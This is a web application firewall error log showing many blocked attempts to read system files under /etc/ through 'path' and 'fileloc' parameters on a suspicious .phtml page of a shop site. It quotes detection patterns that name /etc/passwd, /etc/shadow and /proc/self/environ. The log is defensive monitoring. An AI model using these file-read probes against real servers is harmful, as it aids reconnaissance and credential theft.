[Fri Mar 20 08:56:52.356775 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.77:58104] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BDJ3M9BSuKP7CAYp2wAAAJE"]
[Fri Mar 20 08:56:52.996523 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.26:58120] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BNa6ubjKNq_cu4bg_gAAA04"]
[Fri Mar 20 08:56:53.134031 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.96:58122] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BfXLqtnMIWvjpaKlwAAAApY"]
[Fri Mar 20 08:56:53.748869 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.123:58136] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BTJ3M9BSuKP7CAYp3AAAAIk"]
[Fri Mar 20 08:56:53.875632 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.105:58138] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BV1pVZ5mVmJwsFM8pgAAAE0"]
[Fri Mar 20 08:56:54.109868 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.36:58144] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Bta6ubjKNq_cu4bg_wAAA1M"]
[Fri Mar 20 08:56:54.700010 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.20:58152] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BvqxLDW4GITHUkT0aAAAARg"]
[Fri Mar 20 08:56:54.840284 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.75:58156] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BjJ3M9BSuKP7CAYp3QAAAJI"]
[Fri Mar 20 08:56:55.170552 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.27:58172] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02B9a6ubjKNq_cu4bhAQAAA0o"]
[Fri Mar 20 08:56:55.488902 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.44:58176] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02B11pVZ5mVmJwsFM8qAAAAFY"]
[Fri Mar 20 08:56:55.816319 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.119:58184] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BzJ3M9BSuKP7CAYp3gAAAJc"]
[Fri Mar 20 08:56:56.265243 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.43:58198] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CLninkcc-iUj5ApoqQAAA4U"]
[Fri Mar 20 08:56:56.451439 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.50:58200] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CLninkcc-iUj5ApoqgAAA4A"]
[Fri Mar 20 08:56:56.550386 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.58:58202] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CLninkcc-iUj5ApoqwAAA5I"]
[Fri Mar 20 08:56:57.384595 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.76:58224] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CQF0L0L-SsrnPo5z5AAAAss"]
[Fri Mar 20 08:56:57.911377 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.76:58240] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CeoXxyEfFpUF8f-LmQAAAUk"]
[Fri Mar 20 08:56:57.972703 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.94:58246] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CTJ3M9BSuKP7CAYp3wAAAJU"]
[Fri Mar 20 08:56:58.079564 2026] [:error] [pid 31215:tid 140411557287680] [client 57.141.18.9:58248] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CgF0L0L-SsrnPo5z5gAAAtY"]
[Fri Mar 20 08:56:58.896426 2026] [:error] [pid 31215:tid 140411632822016] [client 57.141.18.16:58262] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CgF0L0L-SsrnPo5z6AAAAs0"]
[Fri Mar 20 08:56:59.236064 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.73:58268] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CwF0L0L-SsrnPo5z6QAAAtM"]
[Fri Mar 20 08:56:59.714548 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.73:58276] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02C9a6ubjKNq_cu4bhAgAAA08"]
[Fri Mar 20 08:56:59.888427 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.43:58286] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02CzJ3M9BSuKP7CAYp4QAAAIM"]
[Fri Mar 20 08:57:00.297924 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.118:58294] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DPqxLDW4GITHUkT0bQAAAQ8"]
[Fri Mar 20 08:57:00.307240 2026] [:error] [pid 21219:tid 140411582465792] [client 57.141.18.84:58296] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DPXLqtnMIWvjpaKlwQAAApM"]
[Fri Mar 20 08:57:00.634396 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.112:58300] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DBCii7xarUs8iHZybgAAAg0"]
[Fri Mar 20 08:57:02.226351 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.25:58308] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Dda6ubjKNq_cu4bhAwAAA1U"]
[Fri Mar 20 08:57:02.226506 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.87:58310] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DfXLqtnMIWvjpaKlwgAAAoM"]
[Fri Mar 20 08:57:02.228328 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.102:58306] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DRCii7xarUs8iHZybwAAAhM"]
[Fri Mar 20 08:57:02.551666 2026] [:error] [pid 9818:tid 140411666392832] [client 57.141.18.15:58324] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Dl1pVZ5mVmJwsFM8rgAAAEk"]
